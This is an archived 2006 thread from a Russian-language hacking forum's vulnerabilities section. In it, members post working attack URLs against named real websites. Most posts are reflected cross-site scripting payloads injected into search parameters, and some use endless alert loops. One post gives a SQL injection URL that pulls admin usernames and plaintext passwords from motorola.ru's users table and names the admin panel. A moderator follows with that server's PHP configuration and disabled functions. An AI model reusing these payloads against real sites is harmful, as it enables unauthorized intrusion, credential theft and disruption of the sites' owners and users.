ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #281  
Старый 25.06.2006, 13:38
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

На таком знаменитом сайте такие знаменитые баги :-)

_http://rusdoc.kulichki.ru/public/search.shtml?searWords="><script>alert()</script>
 

  #282  
Старый 25.06.2006, 17:41
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Мне очень понравился этот баг:
_http://www.sprandi.ru/search?q="><script>alert()</script>


XSS Rulezzz!!!
 

  #283  
Старый 25.06.2006, 17:52
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

http://www.rupoisk.ru/index.php?search_string=%27%3E%3Cscript%3Ealert%28 %29%3C%2Fscript%3E
 

  #284  
Старый 25.06.2006, 17:59
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

_http://www.mediexpo.ru/search/?q="><script>alert()</script>
 

  #285  
Старый 26.06.2006, 12:57
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

_http://magnolia-tv.com/search/?target=news&search="><script>alert()</script>
 

  #286  
Старый 26.06.2006, 16:21
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Цитата:
Сообщение от grinay  
Непонимаю какой смысл т хсс вас это что радует если вы увидете алерТ?
Да блять напишите программу <script>
while(1){
alert('Нажимаю ок пока не заипет');
}</script>
И фтыкайте пока не забудете что такое хсс.
Какой смысл от этой безталковой уязвимости постить всякую хрень на форуме набирая посты..Заипало.
Не обращайте внимания у меня дипресняк..
На:
_http://ncagip.ru/search?needle="><script>while(1){alert();}</script>
 

  #287  
Старый 26.06.2006, 22:20
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Цитата:
Сообщение от grinay  
Ну давай стырь мои куки попробуй..
зачем?




_http://www.volgatelecom.kirov.ru/search/?q="><script>while(1){alert();}</script>
 

  #288  
Старый 26.06.2006, 23:05
fjuDao
Новичок
Регистрация: 27.05.2006
Сообщений: 3
Провел на форуме:
21798

Репутация: 15
По умолчанию

Motorola RU - неожидал

_http://www.motorola.ru/pcomm.php?id=33&action=hole&newsid=3122666+UNION+S ELECT+0,0,0,name,password,0,0,0,0,0,0,0,0,0,0+FROM +users/*

логин и пароль(в чистом виде) к админке:

_http://www.motorola.ru/admin/

 

  #289  
Старый 26.06.2006, 23:20
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

да, но:
safe_mode: ON PHP version: 4.3.11 cURL: OFF MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit
 

  #290  
Старый 27.06.2006, 10:31
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ